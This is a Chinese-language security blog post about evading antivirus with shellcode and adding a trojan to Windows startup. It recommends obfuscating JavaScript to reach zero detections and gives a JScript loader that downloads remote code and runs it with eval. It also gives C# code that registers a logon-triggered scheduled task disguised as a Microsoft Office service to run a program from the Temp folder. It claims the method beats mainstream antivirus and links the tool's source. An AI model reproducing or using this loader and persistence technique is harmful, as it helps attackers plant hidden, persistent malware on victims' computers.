<!doctype html><html lang=zh><meta charset=utf-8><meta name=generator content="Hugo 0.64.0"><meta name=viewport content="width=device-width,initial-scale=1,viewport-fit=cover"><meta name=color-scheme content="light dark"><meta name=supported-color-schemes content="light dark"><title>免杀shellcode并绕过杀毒添加自启动&nbsp;&ndash;&nbsp;WTFSec</title><link rel=stylesheet href=/css/core.min.805532cf9875da8b5e05e28993cdaa5eaf6cb6fd1e14df60b32344efecb93dba87ec77e53ac2336494eb82526410e16c.css integrity=sha384-gFUyz5h12oteBeKJk82qXq9stv0eFN9gsyNE7+y5PbqH7HflOsIzZJTrglJkEOFs><body><div class=base-body><section id=header class="site header"><div class="header wrap"><span class="header left-side"><a class="site home" href=/><span class="site name">WTFSec</span></a></span>
<span class="header right-side"><div class="nav wrap"><nav class=nav><a class="nav item" href=/categories/>分类</a><a class="nav item" href=/tags/>标签</a><a class="nav item" href=/link/>友链</a>
<input placeholder="Google 站内搜索" id=search_input style=width:150px>
<button onclick=search()><svg width="13" height="13" viewBox="0 0 13 13"><title>搜尋</title><path d="m4.8495 7.8226c.82666.0 1.5262-.29146 2.0985-.87438.57232-.58292.86378-1.2877.87438-2.1144.010599-.82666-.28086-1.5262-.87438-2.0985-.59352-.57232-1.293-.86378-2.0985-.87438-.8055-.010599-1.5103.28086-2.1144.87438-.60414.59352-.8956 1.293-.87438 2.0985.021197.8055.31266 1.5103.87438 2.1144.56172.60414 1.2665.8956 2.1144.87438zm4.4695.2115 3.681 3.6819-1.259 1.284-3.6817-3.7.0019784-.69479-.090043-.098846c-.87973.76087-1.92 1.1413-3.1207 1.1413-1.3553.0-2.5025-.46363-3.4417-1.3909s-1.4088-2.0686-1.4088-3.4239.4696-2.4966 1.4088-3.4239c.9392-.92727 2.0864-1.3969 3.4417-1.4088 1.3553-.011889 2.4906.45771 3.406 1.4088.9154.95107 1.379 2.0924 1.3909 3.4239.0 1.2126-.38043 2.2588-1.1413 3.1385l.098834.090049z"/></svg></button></nav></div><script>function search(){const search_value=document.getElementById("search_input").value;if(search_value!==''){window.open("/search/?q="+search_value,"_blank");}}
document.getElementById("search_input").addEventListener("keydown",function(e){if(e.key==="Enter"){search()}});</script></span></div></section><div id=content><section class="article header"><h1 class="article title">免杀shellcode并绕过杀毒添加自启动</h1><p class="article date"><span class=lang><a>Hzllaga</a> </span>Monday, February 17, 2020</p></section><article class="article markdown-body"><p>首先得处理好shellcode，尽量把添加自启动的操作独立成一个Loader，可以避免杀毒软件检测到特征并拦截，这边选择的是利用Javascript来处理Shellcode，而添加自启动的操作由C#来控制，并成功实现了绕过360核晶防护添加计划任务完成木马自启动。</p><p>Shellcode的部分用CACTUSTORCH完成，链接：<a href=https://github.com/mdsecactivebreach/CACTUSTORCH target=_blank>CACTUSTORCH</a>
也可以自己C#编译一个再用DotNetToJScript转Javascript语言，教程：<a href=../%e5%85%8d%e6%9d%80-msf-windows-payload-%e7%9a%84%e6%96%b9%e6%b3%95%e4%b8%8e%e5%ae%9e%e8%b7%b5/>免杀 MSF Windows Payload 的方法与实践</a></p><p>处理完的js脚本，推荐使用sojson的混淆代码，可以实现virustotal的57引擎0报毒，链接：<a href=https://www.sojson.com/jsobfuscator.html target=_blank>Js加密</a>，我一个18年处理的msf shellcode到现在还是0报毒。</p><p>因为混淆了，所以体积自然会变很大，这边提供一个网络加载的方式，可以把体积缩小到4kb：<div class=highlight><pre class=chroma><code class=language-JavaScript data-lang=JavaScript><span class=kd>var</span> <span class=nx>xml</span><span class=o>=</span><span class=k>new</span> <span class=nx>ActiveXObject</span><span class=p>(</span><span class=s2>&#34;Microsoft.XMLHTTP&#34;</span><span class=p>)</span><span class=p>;</span>
<span class=nx>xml</span><span class=p>.</span><span class=nx>open</span><span class=p>(</span><span class=s2>&#34;GET&#34;</span><span class=p>,</span><span class=s2>&#34;http://127.0.0.1/ccc.js&#34;</span><span class=p>,</span><span class=kc>false</span><span class=p>)</span><span class=p>;</span>
<span class=nx>xml</span><span class=p>.</span><span class=nx>send</span><span class=p>(</span><span class=p>)</span><span class=p>;</span>
<span class=kd>var</span> <span class=nx>aaa</span><span class=o>=</span><span class=nx>xml</span><span class=p>.</span><span class=nx>responseText</span><span class=p>;</span>
<span class=nb>eval</span><span class=p>(</span><span class=nx>aaa</span><span class=p>)</span><span class=p>;</span>
</code></pre></div>因为是WSH模式的，当然还能用WScript.Arguments.Item(0);的方式来传递代码，可以直接注入一个加密的代码，然后在写一段解密的代码会更隐蔽。</p><p>再来谈谈添加自启动，因为程序现在不需要处理上面那些行为，所以杀毒不会拦截，代码：<div class=highlight><pre class=chroma><code class=language-js data-lang=js><span class=nx>TaskSchedulerClass</span> <span class=nx>scheduler</span> <span class=o>=</span> <span class=k>new</span> <span class=nx>TaskSchedulerClass</span><span class=p>(</span><span class=p>)</span><span class=p>;</span>
<span class=c1>//连接
</span><span class=c1></span><span class=nx>scheduler</span><span class=p>.</span><span class=nx>Connect</span><span class=p>(</span><span class=kc>null</span><span class=p>,</span> <span class=kc>null</span><span class=p>,</span> <span class=kc>null</span><span class=p>,</span> <span class=kc>null</span><span class=p>)</span><span class=p>;</span>
<span class=c1>//获取创建任务的目录
</span><span class=c1></span><span class=nx>ITaskFolder</span> <span class=nx>folder</span> <span class=o>=</span> <span class=nx>scheduler</span><span class=p>.</span><span class=nx>GetFolder</span><span class=p>(</span><span class=s2>&#34;\\&#34;</span><span class=p>)</span><span class=p>;</span>
<span class=c1>//设置参数
</span><span class=c1></span><span class=nx>ITaskDefinition</span> <span class=nx>task</span> <span class=o>=</span> <span class=nx>scheduler</span><span class=p>.</span><span class=nx>NewTask</span><span class=p>(</span><span class=mi>0</span><span class=p>)</span><span class=p>;</span>
<span class=nx>task</span><span class=p>.</span><span class=nx>RegistrationInfo</span><span class=p>.</span><span class=nx>Author</span> <span class=o>=</span> <span class=s2>&#34;Microsoft Office&#34;</span><span class=p>;</span><span class=c1>//创建者
</span><span class=c1></span><span class=nx>task</span><span class=p>.</span><span class=nx>RegistrationInfo</span><span class=p>.</span><span class=nx>Description</span> <span class=o>=</span> <span class=s2>&#34;This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.&#34;</span><span class=p>;</span><span class=c1>//描述
</span><span class=c1></span><span class=c1>//设置触发机制（此处是 登陆后）
</span><span class=c1></span><span class=nx>task</span><span class=p>.</span><span class=nx>Triggers</span><span class=p>.</span><span class=nx>Create</span><span class=p>(</span><span class=nx>_TASK_TRIGGER_TYPE2</span><span class=p>.</span><span class=nx>TASK_TRIGGER_LOGON</span><span class=p>)</span><span class=p>;</span>
<span class=c1>//设置动作（此处为运行exe程序）
</span><span class=c1></span><span class=nx>IExecAction</span> <span class=nx>action</span> <span class=o>=</span> <span class=p>(</span><span class=nx>IExecAction</span><span class=p>)</span><span class=nx>task</span><span class=p>.</span><span class=nx>Actions</span><span class=p>.</span><span class=nx>Create</span><span class=p>(</span><span class=nx>_TASK_ACTION_TYPE</span><span class=p>.</span><span class=nx>TASK_ACTION_EXEC</span><span class=p>)</span><span class=p>;</span>
<span class=nx>action</span><span class=p>.</span><span class=nx>Path</span> <span class=o>=</span> <span class=nx>Path</span><span class=p>.</span><span class=nx>GetTempPath</span><span class=p>(</span><span class=p>)</span> <span class=o>+</span> <span class=err>@</span><span class=s2>&#34;\&#34; + file + &#34;</span><span class=p>.</span><span class=nx>exe</span><span class=s2>&#34;;//设置文件目录
</span><span class=s2>task.Settings.ExecutionTimeLimit = &#34;</span><span class=nx>PT0S</span><span class=s2>&#34;; //运行任务时间超时停止任务吗? PTOS 不开启超时
</span><span class=s2>task.Settings.DisallowStartIfOnBatteries = false;//只有在交流电源下才执行
</span><span class=s2>task.Settings.RunOnlyIfIdle = false;//仅当计算机空闲下才执行
</span><span class=s2>
</span><span class=s2>IRegisteredTask regTask =
</span><span class=s2>    folder.RegisterTaskDefinition(&#34;</span><span class=nx>Office</span> <span class=nx>ClickToRun</span> <span class=nx>Service</span> <span class=nx>Monitor</span><span class=s2>&#34;, task,//此处需要设置任务的名称（name）
</span><span class=s2>    (int)_TASK_CREATION.TASK_CREATE, null, //user
</span><span class=s2>    null, // password
</span><span class=s2>    _TASK_LOGON_TYPE.TASK_LOGON_INTERACTIVE_TOKEN,
</span><span class=s2>    &#34;</span><span class=err>&#34;</span><span class=p>)</span><span class=p>;</span>
<span class=nx>IRunningTask</span> <span class=nx>runTask</span> <span class=o>=</span> <span class=nx>regTask</span><span class=p>.</span><span class=nx>Run</span><span class=p>(</span><span class=kc>null</span><span class=p>)</span><span class=p>;</span>
</code></pre></div>程序添加完自启动，还能顺便把上面网络加载的js脚本释放出来并运行，到发布日期0217能过各种主流杀毒不被查杀并正常上线。<a target=_blank rel="noopener noreferrer" href=https://cdn.wtfsec.org/img/20200222165121.png><img src=https://cdn.wtfsec.org/img/20200222165121.png alt></a>
相关代码已经发布在Github上，链接：<a href=https://github.com/Hzllaga/JsLoader target=_blank>https://github.com/Hzllaga/JsLoader</a></p><section class="article labels"><a class=category href=/categories/%E5%8E%9F%E5%88%9B/>原创</a><a class=tag href=/tags/%E5%85%8D%E6%9D%80/>免杀</a><a class=tag href=/tags/shellcode/>shellcode</a></section></article><div class="article navigation"><p><a class=link href=/posts/red-alert-pwn-challenges-write-up/><span class=li>&rarr;</span>Red Alert Pwn Challenges Write Up</a></p></div></div><section id=footer class=footer><div class=footer-wrap><p class=copyright>©2014-2020 WTFSec.</p><p class=powerby><span>Powered by </span><a href=https://gohugo.io target=_blank>Hugo</a><span> and the </span><a href=https://themes.gohugo.io/hugo-notepadium/ target=_blank>Notepadium</a></p><p class=powerby><span>CDN by </span><a href=https://cf.wtfsec.org target=_blank>Cloudflare</a><span> and </span><a href="https://console.upyun.com/register/?invite=H1xhvqTVV" target=_blank>又拍云</a></p></div></section><script type=application/javascript>var doNotTrack=false;if(!doNotTrack){window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;ga('create','UA-83215806-1','auto');ga('send','pageview');}</script><script async src=https://www.google-analytics.com/analytics.js></script><script data-ad-client=ca-pub-4220670081232153 async src=https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js></script></div></body></html>